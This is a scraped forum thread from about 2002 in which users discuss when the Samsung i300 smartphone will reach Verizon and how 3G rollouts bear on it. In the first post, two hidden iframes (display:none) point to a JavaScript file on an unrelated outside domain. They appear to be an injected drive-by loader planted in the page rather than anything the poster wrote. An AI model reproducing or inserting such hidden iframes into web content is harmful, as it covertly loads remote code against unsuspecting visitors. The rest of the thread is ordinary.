+ Reply to Thread
    DMZ
    Dere's a Little of Me In all A Yiz DMZ's Avatar

Lightbulb Want the I300, But Don't Like Sprint PCS?

The Verizon version of the I300 had a tentative release goal of December 2001. Samsung and Verizon have both indicated an anticipated release in the coming quarter.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by mjorange; 01-21-2002 at 01:40 PM.

Question any new news?

anyone know if there is any recent news about using this phone on verizon? i noticed it is a cdma 800 phone (from this site).

that is what verizon uses. shouldnt it just work if i go buy it somewhere and have verizon turn it on?

PalmVenue Guy
    Getting my Verizon hookup this week...

Verizon not available til end of 2002

I checked last week with Verizon and it was supposed to be out this month but they had problems and now it is scheduled for the end of 2002!

I switched from Verizon to SprintPCS yesterday when I got my new I300. I love it!

Rick

Did you get the I300 hooked up to Verizon??
    Verizon told me their phone won't be available until the end of 2002!

Rick

PalmVenue Guy
    I'm setup w/ Verizon now, but I'm still a "beta tester." Not sure when the final public release date is happening, but I'm thinking it will be well before the EOY...

Verizon i300

I have not heard anything new about Verizon and the i300. What I do know is that if they are planning on launching the i300 in December, the phone will be only 1-2 months from being replaced by the i330. In addition, both Sprint PCS and Verizon are moving forward with their 3G networks. Sprint PCS will have nationwide 3G data and voice by mid-year 2002 and Verizon is moving from market to market launching 3G voice and sometimes data (they are not expecting to have 3G nationwide until 2003 sometime). With the upgrades in wireless data speed, it would seem to be foolish and moving in the opposite direction for Verizon to launch any phone that late that is not already 3G voice and data, or can be upgraded to support 3G. At the very least, the should not launch any phones that are not 3G voice from this point on.

homer